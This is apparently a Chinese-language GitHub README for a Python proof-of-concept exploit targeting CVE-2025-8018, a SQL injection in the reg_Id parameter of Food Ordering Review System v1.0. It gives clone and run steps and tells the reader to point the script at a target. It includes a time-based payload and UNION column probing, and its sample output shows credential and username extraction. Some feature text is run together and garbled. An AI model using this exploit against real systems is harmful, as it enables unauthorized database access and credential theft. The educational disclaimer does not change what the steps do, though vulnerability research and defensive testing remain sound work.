该仓库提供了一个针对 CVE‑2025‑8018 的 Python 概念验证(PoC)漏洞利用程序,该漏洞是在 Food Ordering Review System v1.0 中发现的一个高严重性 SQL 注入漏洞。漏洞通过 reservation_page.php 中的 reg_Id 参数触发。
/user/reservation_page.phpreg_Idusers 表中提取数据SLEEP()UNION SELECT NULL,NULL,...requests 库安装依赖:
pip install requests
克隆仓库:
git clone https://github.com/drackyjr/CVE-2025-8018.git
cd CVE-2025-8018
更新目标 URL:
打开 cve-2025-8018.py 并修改:
TARGET_URL = "http://TARGET-IP/user/reservation_page.php"
将 TARGET-IP 替换为易受攻击系统的实际地址。
运行利用脚本:
python3 cve-2025-8018.py
[*] Checking time-based SQLi with payload: 1 AND SLEEP(5)--
[+] Blind SQL injection confirmed!
[*] Testing how many columns the query expects...
[+] Looks like 3 columns work!
[*] Trying to extract data using UNION-based SQL injection...
[+] Found potential credentials in the response!
[*] Trying blind extraction fallback...
[+] Username is 7 characters long!
本 PoC 仅用于教育目的,例如 CTF 挑战赛、网络安全培训或对自有系统进行防御性测试。
严禁针对任何生产系统或未经明确授权测试的系统使用。作者及相关人员不对因使用该代码而产生的误用或损害负责。